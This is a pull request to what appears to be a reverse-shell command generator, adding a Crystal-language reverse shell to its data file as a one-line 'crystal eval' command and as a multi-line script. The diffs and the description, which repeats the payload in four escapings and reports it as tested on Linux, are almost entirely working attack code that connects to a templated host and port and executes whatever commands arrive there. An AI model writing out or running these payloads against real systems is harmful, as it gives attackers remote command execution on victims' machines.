### PR TITLE
add crystall rev shell

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -361,10 +361,15 @@ const reverseShellCommands = withCommandType(
             "meta": ["linux", "mac", "windows"]
         },
         {
-            "name": "Crystal",
+            "name": "Crystal (system)",
             "command": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"{ip}\",{port});loop{m,l=c.receive;p=Process.new(m.rstrip(\"\\n\"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'",
             "meta": ["linux", "windows", "mac"]
         },
+        {
+            "name": "Crystal (code)",
+            "command": "require \"process\"\nrequire \"socket\"\n\nc = Socket.tcp(Socket::Family::INET)\nc.connect(\"{ip}\", {port})\nloop do \n  m, l = c.receive\n  p = Process.new(m.rstrip(\"\\n\"), output:Process::Redirect::Pipe, shell:true)\n  c << p.output.gets_to_end\nend",
+            "meta": ["linux", "mac"]
+        }
     ]
 );
 

--- a/js/data.js
+++ b/js/data.js
@@ -359,7 +359,12 @@ const reverseShellCommands = withCommandType(
             "name": "Dart",
             "command": "import 'dart:io';\nimport 'dart:convert';\n\nmain() {\n  Socket.connect(\"{ip}\", {port}).then((socket) {\n    socket.listen((data) {\n      Process.start('{shell}', []).then((Process process) {\n        process.stdin.writeln(new String.fromCharCodes(data).trim());\n        process.stdout\n          .transform(utf8.decoder)\n          .listen((output) { socket.write(output); });\n      });\n    },\n    onDone: () {\n      socket.destroy();\n    });\n  });\n}",
             "meta": ["linux", "mac", "windows"]
-        }
+        },
+        {
+            "name": "Crystal",
+            "command": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"{ip}\",{port});loop{m,l=c.receive;p=Process.new(m.rstrip(\"\\n\"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'",
+            "meta": ["linux", "windows", "mac"]
+        },
     ]
 );
 


### PR DESCRIPTION
One-line command (not JSON escape)

```bash
crystal eval 'require "process";require "socket";c=Socket.tcp(Socket::Family::INET);c.connect("{ip}",{port});loop{m,l=c.receive;p=Process.new(m.rstrip("\n"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'
```

One-line command (JSON escaped)

```json
{
  "command": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"{ip}\",{port});loop{m,l=c.receive;p=Process.new(m.rstrip(\"\\n\"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'"
}
```

Multi-line beautified code (not system command, not JSON escaped)

```crystal
require "process"
require "socket"

c = Socket.tcp(Socket::Family::INET)
c.connect("{ip}", {port})
loop do 
  m, l = c.receive
  p = Process.new(m.rstrip("\n"), output:Process::Redirect::Pipe, shell:true)
  c << p.output.gets_to_end
end
```

Multi-line beautified code (not system command, JSON escaped)

```json
{
  "command": "'require \"process\"\nrequire \"socket\"\n\nc = Socket.tcp(Socket::Family::INET)\nc.connect(\"{ip}\", {port})\nloop do \n m, l = c.receive\n p = Process.new(m.rstrip(\"\\n\"), output:Process::Redirect::Pipe, shell:true)\n c << p.output.gets_to_end\nend"
}
```

Inspired by https://github.com/Potato-Industries/crs/blob/main/crs.cr.

Tested working with Crystal v1.7.2 on a Linux target.